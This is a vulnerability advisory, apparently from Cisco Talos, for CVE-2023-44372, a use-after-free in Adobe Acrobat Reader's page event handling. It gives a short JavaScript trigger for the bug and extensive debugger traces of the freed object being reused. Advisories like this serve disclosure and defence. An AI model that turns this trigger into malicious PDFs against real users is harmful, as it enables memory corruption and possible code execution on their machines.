CVE-2023-44372
A use-after-free vulnerability exists in the page event processing in Adobe Acrobat Reader 2023.006.20320. A specially crafted Javascript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and could result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Adobe Acrobat Reader 2023.006.20320
Acrobat Reader - https://acrobat.adobe.com/us/en/acrobat/pdf-reader.html
8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-416 - Use After Free
Adobe Acrobat Reader is one of the most popular and feature-rich PDF readers on the market. It has a large user base and is usually a default PDF reader on systems. It also integrates into web browsers as a plugin for rendering PDFs.
Adobe’s PDF JavaScript environment always has an event object associated with the current execution. There are different types of event objects available inside different event handlers, such as a field event object or page open event object. There exists a use-after-free vulnerability in the way Adobe Acrobat handles the lifetime of these objects, specifically with the pages containing U3D objects. The following excerpt from the PoC demonstrates this vulnerability:
function main() {
this.pageNum = 4;
app.activeDocs[0].addField("poc", "text", 4, [16,15,10,5] ) ;
getField("poc").setAction("Format",'set_page();'); }
}
function set_page() {
this.pageNum = 0;
}
In the above excerpt, the addField method adds a text field poc. Next, a callback function set_page is assigned to the Format action of the poc text field. When set_page is called it sets the page, which triggers a page event. This frees an object related to the poc text field. The use-after-free vulnerability occurs when the freed object is used without any validation. We can observe the following in the debugger (with PageHeap enabled):
0:000> g
Breakpoint 4 hit
eax=00000001 ebx=4dcd4e78 ecx=f147eeb8 edx=00000000 esi=4dcd4e48 edi=00000000
eip=70f8f57f esp=0506ed0c ebp=0506ed34 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
AcroRd32!AIDE::PixelPartInfo::operator=+0x5470ff:
70f8f57f 8955fc mov dword ptr [ebp-4],edx ss:002b:0506ed30=ffffffff
0:000> dd esi ;<---------------- [1]
4dcd4e48 71b3cf18 00000000 00000000 ffffffff
4dcd4e58 00000000 00000000 00000000 000003d5
4dcd4e68 00000132 000004ba 00000001 00010001
4dcd4e78 00000001 00000000 00000000 00000004
4dcd4e88 f147eeb8 59fc4ff8 00000143 00000000
4dcd4e98 719da464 5f744fe8 00000000 00000000
4dcd4ea8 00000000 00000000 00000000 00000000
4dcd4eb8 00000000 00000000 00000000 00000000
0:000> u
AcroRd32!AIDE::PixelPartInfo::operator=+0x5470ff:
70f8f57f 8955fc mov dword ptr [ebp-4],edx
70f8f582 e8f3c5e6ff call AcroRd32!AIDE::PixelPartInfo::operator=+0x3b36fa (70dfbb7a) ;<---------------- [2]
70f8f587 8b4e40 mov ecx,dword ptr [esi+40h]
70f8f58a 8bf8 mov edi,eax
70f8f58c 56 push esi
70f8f58d 689002f970 push offset AcroRd32!AIDE::PixelPartInfo::operator=+0x547e10 (70f90290)
70f8f592 6a02 push 2
70f8f594 897e34 mov dword ptr [esi+34h],edi
0:000> g
(9d8.220): Break instruction exception - code 80000003 (first chance)
eax=000000e2 ebx=bac78000 ecx=bac8e55d edx=00000005 esi=0506e068 edi=bada9070
eip=ba423d5b esp=0506e068 ebp=0506e224 iopl=0 nv up ei pl nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000213
EScript!mozilla::HashBytes+0x28ceb:
ba423d5b 3de4000000 cmp eax,0E4h ;<---------------- [3]
0:000> g
(9d8.220): Break instruction exception - code 80000003 (first chance)
eax=000000e4 ebx=bac78000 ecx=bac8e562 edx=00000005 esi=0506e068 edi=bada9078
eip=ba423d5b esp=0506e068 ebp=0506e224 iopl=0 nv up ei pl nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000213
EScript!mozilla::HashBytes+0x28ceb:
ba423d5b 3de4000000 cmp eax,0E4h
0:000> g
(9d8.220): Break instruction exception - code 80000003 (first chance)
eax=0000003e ebx=bac78000 ecx=bc87d869 edx=00000001 esi=0506e068 edi=00000000
eip=ba423d5b esp=0506e068 ebp=0506e224 iopl=0 nv up ei pl nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000217
EScript!mozilla::HashBytes+0x28ceb:
ba423d5b 3de4000000 cmp eax,0E4h
0:000> g
(9d8.220): Break instruction exception - code 80000003 (first chance)
eax=00000036 ebx=bac78000 ecx=bc87d86a edx=00000001 esi=0506e068 edi=00000000
eip=ba423d5b esp=0506e068 ebp=0506e224 iopl=0 nv up ei pl nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000213
EScript!mozilla::HashBytes+0x28ceb:
ba423d5b 3de4000000 cmp eax,0E4h
0:000> g
(9d8.220): Break instruction exception - code 80000003 (first chance)
eax=0506def4 ebx=0506e034 ecx=baf3a4c0 edx=ffffff85 esi=bac78000 edi=bac78000
eip=ba54af6c esp=0506de7c ebp=0506ded4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
EScript!PlugInMain+0xbafc:
ba54af6c 837dc881 cmp dword ptr [ebp-38h],0FFFFFF81h ss:002b:0506de9c=ffffff85
0:000> pc
eax=0506e034 ebx=0506e034 ecx=baf3a4c0 edx=ffffff85 esi=bac78000 edi=bac78000
eip=ba54af84 esp=0506de78 ebp=0506ded4 iopl=0 nv up ei ng nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000292
EScript!PlugInMain+0xbb14:
ba54af84 e8210aeeff call EScript!mozilla::HashBytes+0x3093a (ba42b9aa)
0:000> pc
eax=d863efb8 ebx=00000000 ecx=58e59038 edx=ffffff85 esi=bac78000 edi=d863efb8
eip=ba54afaa esp=0506de70 ebp=0506ded4 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
EScript!PlugInMain+0xbb3a:
ba54afaa e8f067eeff call EScript!mozilla::HashBytes+0x3672f (ba43179f)
0:000> p
eax=baf3a4c0 ebx=00000000 ecx=00000000 edx=ffffff85 esi=bac78000 edi=d863efb8
eip=ba54afaf esp=0506de70 ebp=0506ded4 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
EScript!PlugInMain+0xbb3f:
ba54afaf 50 push eax
0:000> dd eax
baf3a4c0 00000078 baf3a4c8 00610070 00650067
baf3a4d0 0075004e 0000006d 00000000 00000000
baf3a4e0 00000048 baf3a4e8 006f007a 006d006f
baf3a4f0 00000000 00000000 00000000 00000000
0:000> du baf3a4c8 ;<---------------- [4]
baf3a4c8 "pageNum"
0:000> g
eax=00000001 ebx=f0260f60 ecx=388dd4af edx=089f10d0 esi=4dcd4e48 edi=4dcd4e48
eip=70f4061e esp=0506dc30 ebp=0506dc44 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
AcroRd32!AIDE::PixelPartInfo::operator=+0x4f819e:
70f4061e 56 push esi ;<---------------- [5]
0:000> dd 4dcd4e48 ;<---------------- [6]
4dcd4e48 7186a5e0 00000000 00000000 ffffffff
4dcd4e58 00000000 00000000 00000000 000003d5
4dcd4e68 00000132 000004ba 00000001 00000001
4dcd4e78 00000001 00000000 00000000 00000004
4dcd4e88 f147eeb8 59fc4ff8 00000143 00000000
4dcd4e98 7186a5e0 5f744fe8 00000000 00000000
4dcd4ea8 00000000 00000000 00000000 00000000
4dcd4eb8 00000000 00000000 00000000 00000000
0:000> p
eax=00000001 ebx=f0260f60 ecx=388dd4af edx=089f10d0 esi=4dcd4e48 edi=4dcd4e48
eip=70f4061f esp=0506dc2c ebp=0506dc44 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
AcroRd32!AIDE::PixelPartInfo::operator=+0x4f819f:
70f4061f e89c6b1fff call AcroRd32!AcroWinMainSandbox+0x81b0 (701371c0) ;<---------------- [7]
0:000> p
eax=00000001 ebx=f0260f60 ecx=4dcd4e48 edx=089f10e0 esi=4dcd4e48 edi=4dcd4e48
eip=70f40624 esp=0506dc2c ebp=0506dc44 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
AcroRd32!AIDE::PixelPartInfo::operator=+0x4f81a4:
70f40624 eb0c jmp AcroRd32!AIDE::PixelPartInfo::operator=+0x4f81b2 (70f40632)
0:000> dd 4dcd4e48 ;<---------------- [8]
4dcd4e48 ???????? ???????? ???????? ????????
4dcd4e58 ???????? ???????? ???????? ????????
4dcd4e68 ???????? ???????? ???????? ????????
4dcd4e78 ???????? ???????? ???????? ????????
4dcd4e88 ???????? ???????? ???????? ????????
4dcd4e98 ???????? ???????? ???????? ????????
4dcd4ea8 ???????? ???????? ???????? ????????
4dcd4eb8 ???????? ???????? ???????? ????????
0:000> p
eax=00000001 ebx=f0260f60 ecx=4dcd4e48 edx=089f10e0 esi=4dcd4e48 edi=4dcd4e48
eip=70f40632 esp=0506dc2c ebp=0506dc44 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
AcroRd32!AIDE::PixelPartInfo::operator=+0x4f81b2:
70f40632 59 pop ecx
At [1] above, the esi register contains the vulnerable buffer. The method called at [2] eventually calls the interpreter to execute the bytecodes of the set_page function at [3] and [4]. The execution of bytecodes triggers a page event, which eventually calls the free function at [7]. The argument of the free function comes from the esi register at [5]. The value of the vulnerable buffer is examined at [6], and [8] shows its value before and after the free function is called. The vulnerable freed buffer is later used without any validation. This can be observed in a debugger at the time of the crash:
0:000> g
Breakpoint 6 hit
eax=58c88f90 ebx=4dcd4e78 ecx=70dfbca4 edx=089f1078 esi=4dcd4e48 edi=00000000
eip=70dfbca4 esp=0506ed08 ebp=0506ed34 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x3b3824:
70dfbca4 c20400 ret 4
0:000> p
eax=58c88f90 ebx=4dcd4e78 ecx=70dfbca4 edx=089f1078 esi=4dcd4e48 edi=00000000
eip=70f8f587 esp=0506ed10 ebp=0506ed34 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x547107:
70f8f587 8b4e40 mov ecx,dword ptr [esi+40h] ds:002b:4dcd4e88=???????? ;<---------------- [9]
0:000> u
AcroRd32!AIDE::PixelPartInfo::operator=+0x547107:
70f8f587 8b4e40 mov ecx,dword ptr [esi+40h]
70f8f58a 8bf8 mov edi,eax
70f8f58c 56 push esi
70f8f58d 689002f970 push offset AcroRd32!AIDE::PixelPartInfo::operator=+0x547e10 (70f90290)
70f8f592 6a02 push 2
70f8f594 897e34 mov dword ptr [esi+34h],edi
70f8f597 e8b6705aff call AcroRd32!CTJPEGMetaData::operator=+0x14a8a2 (70536652)
70f8f59c 8b4e40 mov ecx,dword ptr [esi+40h]
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0506ed34 70f43b5c 388de517 dbaecab8 4dcd4e48 AcroRd32!AIDE::PixelPartInfo::operator=+0x547107
01 0506ed90 70f45094 00000001 70f3835d 388de6ab AcroRd32!AIDE::PixelPartInfo::operator=+0x4fb6dc
02 0506ee2c 70f3b254 00000001 00000000 00000001 AcroRd32!AIDE::PixelPartInfo::operator=+0x4fcc14
03 0506ee74 70f3fb7c 576ece40 00000001 00000000 AcroRd32!AIDE::PixelPartInfo::operator=+0x4f2dd4
04 0506eeb0 701b349b 576ece40 388de78f 24e10f50 AcroRd32!AIDE::PixelPartInfo::operator=+0x4f76fc
05 0506ef08 701b18b5 0005a45e 388de727 15fa8fd0 AcroRd32!DllCanUnloadNow+0x4c08b
06 0506efa0 701b15ba 0005a45e 701b12b7 388de77f AcroRd32!DllCanUnloadNow+0x4a4a5
07 0506eff8 70139ec4 000004d3 00000000 701399c0 AcroRd32!DllCanUnloadNow+0x4a1aa
08 0506f014 76b58e71 00050288 00000113 000004d3 AcroRd32!AcroWinMainSandbox+0xaeb4
09 0506f040 76b590d1 701399c0 00050288 00000113 USER32!_InternalCallWinProc+0x2b
0a 0506f0d4 76b5a66f 701399c0 00000000 00000113 USER32!UserCallWinProcCheckWow+0x18e
0b 0506f140 76b5a6e0 3919e0cf 0506f164 701b0b97 USER32!DispatchMessageWorker+0x208
0c 0506f14c 701b0b97 0506f180 17901da8 17901da8 USER32!DispatchMessageW+0x10
0d 0506f164 701b079e 0506f180 388df95f 17901da8 AcroRd32!DllCanUnloadNow+0x49787
0e 0506f1d8 701b04e0 388dfa97 17901da8 00000000 AcroRd32!DllCanUnloadNow+0x4938e
0f 0506f210 7012f783 388dfa03 1137cff8 00000000 AcroRd32!DllCanUnloadNow+0x490d0
10 0506f284 7012f19f 6ffa0000 00b30000 1137cff8 AcroRd32!AcroWinMainSandbox+0x773
11 0506f6a8 00d151a0 6ffa0000 00b30000 1137cff8 AcroRd32!AcroWinMainSandbox+0x18f
12 0506fa5c 00d616ba 00b30000 00000000 08a004e8 AcroRd32_exe!IsSandboxedProcess+0x125800
13 0506faa8 77107c04 fedbe000 77107be0 3dbd786d AcroRd32_exe!AcroRd32IsBrokerProcess+0x1d53a
14 0506fabc 7782b90f fedbe000 3d2f5cfc 00000000 KERNEL32!BaseThreadInitThunk+0x24
15 0506fb04 7782b8da ffffffff 778106e8 00000000 ntdll!__RtlUserThreadStart+0x2f
16 0506fb14 00000000 00d10e10 fedbe000 00000000 ntdll!_RtlUserThreadStart+0x1b
In the above debugger output, the crash occurs when esi is dereferenced, as if it were an object pointer. Depending on the memory layout of the process, it may be possible to abuse this vulnerability for arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.
2023-10-09 - Vendor Disclosure
2023-11-14 - Vendor Patch Release
2023-11-15 - Public Release
Discovered by Kamlapati Choubey of Cisco Talos.